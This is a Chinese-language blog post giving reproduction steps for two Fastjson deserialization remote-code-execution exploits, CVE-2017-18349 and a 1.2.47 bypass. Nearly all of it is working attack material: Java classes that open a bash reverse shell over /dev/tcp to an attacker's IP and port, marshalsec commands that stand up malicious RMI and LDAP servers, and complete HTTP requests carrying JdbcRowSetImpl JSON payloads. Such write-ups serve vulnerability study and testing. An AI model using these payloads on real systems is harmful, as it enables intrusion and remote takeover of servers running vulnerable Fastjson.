Fastjson

1.漏洞复现

CVE-2017-18349

影响范围:Fastjson <= 1.2.24

创建TouchFile.java

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/IP/端口 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
        }
    }
}

生成TouchFile.class,然后放入自己网站根目录

javac TouchFile.java

marshalsec工具,https://github.com/mbechler/marshalsec

开启RMI服务,监听9999端口

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://自己网站IP:80/#TouchFile" 9999

先用NC监听,GET请求反弹shell

POST / HTTP/1.1
Host: 192.168.135.131:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 164

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.165.79:9999/TouchFile",
        "autoCommit":true
    }
}

1.2.47-rce

影响范围:Fastjson <= 1.2.47

创建Exploit.java

import java.io.BufferedReader;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
 
public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/端口;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is)); 
        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        } 
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    } 
    public static void main(String[] args) throws Exception {
    }
}

生成Exploit.class,然后放入自己网站根目录

javac Exploit.java

marshalsec工具,https://github.com/mbechler/marshalsec

开启RMI服务,监听9999端口

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://自己网站IP:80/#Exploit" 9999

先用NC监听,GET请求反弹shell

POST / HTTP/1.1
Host: 192.168.135.131:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 267

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.165.79:9999/Exploit",
        "autoCommit":true
    }
}
posted @ 2023-01-17 16:47  Hacker&Cat  阅读(63)  评论(0编辑  收藏  举报